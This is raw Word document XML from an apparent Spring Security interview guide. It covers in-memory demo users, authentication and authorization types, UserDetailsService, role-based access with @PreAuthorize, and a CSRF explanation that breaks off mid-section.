          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1307696A"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nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63B0DF"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httpBasic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718518AD"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A10917F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA774D"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF875D"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UserDetailsService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> userDetailsServi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EE8ABB6"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ar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> us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Us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withUsernam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user"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F105669"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asswor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oop}password"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFC632"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oles</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USER"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF35403"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEAEE01"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ar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> admi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Us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withUsernam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dmin"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B95A08"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assword</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noop}admin"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFAB31"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oles</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DMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1738CF"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB5E61"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nMemoryUserDetailsManag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s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dmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B906869" w14:textId="77777777"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9839940" w14:textId="2291D961" w:rsidR="00753CC8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F301FC" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E05B5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05B82F7">
          <v:rect id="_x0000_i2143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A00E64" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Authentication Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA62E11" w14:textId="77777777" w:rsidR="00B73020" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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rname/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DA57C" w14:textId="77777777" w:rsidR="00B73020" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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oken-based (JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E90AB4" w14:textId="77777777" w:rsidR="00B73020" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Auth2 / OpenID Connect (Google, GitHub)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094A370" w14:textId="1498E72B" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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iometric / SSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514ECB08" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E05B5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1BBDB54">
          <v:rect id="_x0000_i2144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFC1BE" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Authorization Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E15FF" w14:textId="77777777" w:rsidR="00B73020" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ole-based (RBAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C48054" w14:textId="77777777" w:rsidR="00B73020" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ermission-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12676665" w14:textId="7803C5B4" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ttribute-based access control (ABAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CFE6A4" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E05B5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ED9F5B1">
          <v:rect id="_x0000_i2145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFF306" w14:textId="77777777" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00E05B5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Real-World Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0008BC" w14:textId="77777777" w:rsidR="00C66656" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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uthentication is showing your ID at the gate to prove your identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB1807" w14:textId="0C7FC047" w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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uthorization is whether you're allowed to enter the VIP lounge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B17BC" w14:textId="621F37C6" w:rsidR="008C4090" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008C409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BD0BE3F">
          <v:rect id="_x0000_i2146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A318D" w14:textId="1CE30E59" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E10" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc196307942"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of UserDetailsService in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="1F219A4F" w14:textId="2A60F0DA" w:rsidR="00231E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E10" w:rsidP="00220158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load user-specific data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during authentication. You override it to fetch user details from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DB, LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or any source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760218B7" w14:textId="77777777" w:rsidR="00231E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E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4873735"/>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nterfac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UserDetailsServic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97B146C" w14:textId="77777777" w:rsidR="00231E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E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487373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UserDetails</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> loadUserByUsername</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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41808ABE" w14:textId="75543F3B" w:rsidR="00231E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E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4873735"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AF702" w14:textId="708ED639" w:rsidR="00C32F38" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C32F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2862C791">
          <v:rect id="_x0000_i2147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782217B" w14:textId="245D0AFB" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00796528" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc196307943"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement Role-Based Authorization</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="464B40E1" w14:textId="2744D025" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F5485" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Use method security or HTTP configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441B737" w14:textId="77777777" w:rsidR="00DB28EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28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581169"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Method level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E7419" w14:textId="77777777" w:rsidR="00DB28EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28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581169"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@PreAuthoriz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asRole('ADMIN')"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358C8FB" w14:textId="77777777" w:rsidR="00DB28EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28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581169"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30234696" w14:textId="77777777" w:rsidR="00DB28EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28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581169"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// HTTP configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44069CBA" w14:textId="678098F1" w:rsidR="00DB28EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB28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581169"/>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ntMatchers</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dmi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hasRol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DMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5EDEB3" w14:textId="053899B9" w:rsidR="00C32F38" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C32F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="400B1BDC">
          <v:rect id="_x0000_i2148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="022EE732" w14:textId="4FEAD79F" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00673879" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="_Toc196307944"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is CSRF and how does Spring Security protect against it</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w14:paraId="2A78DB82" w14:textId="2DEF37F5" w:rsidR="00156347" w:rsidRPr="00CE4B95" w:rsidRDefault="00156347" w:rsidP="00DC0486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an attack that forces authenticated users to perform unwanted actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989E543" w14:textId="77777777" w:rsidR="00156347" w:rsidRPr="00CE4B95" w:rsidRDefault="00156347" w:rsidP="00156347">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security enables CSRF protection by default for non-GET methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C681A64" w14:textId="5D71D72C" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00156347" w:rsidP="00156347">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To disable (not recommended unless you're using stateless APIs like JWT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DC5A9" w14:textId="42D36F7D" w:rsidR="00E063CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00E0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2297447"/>
        <w:rPr>
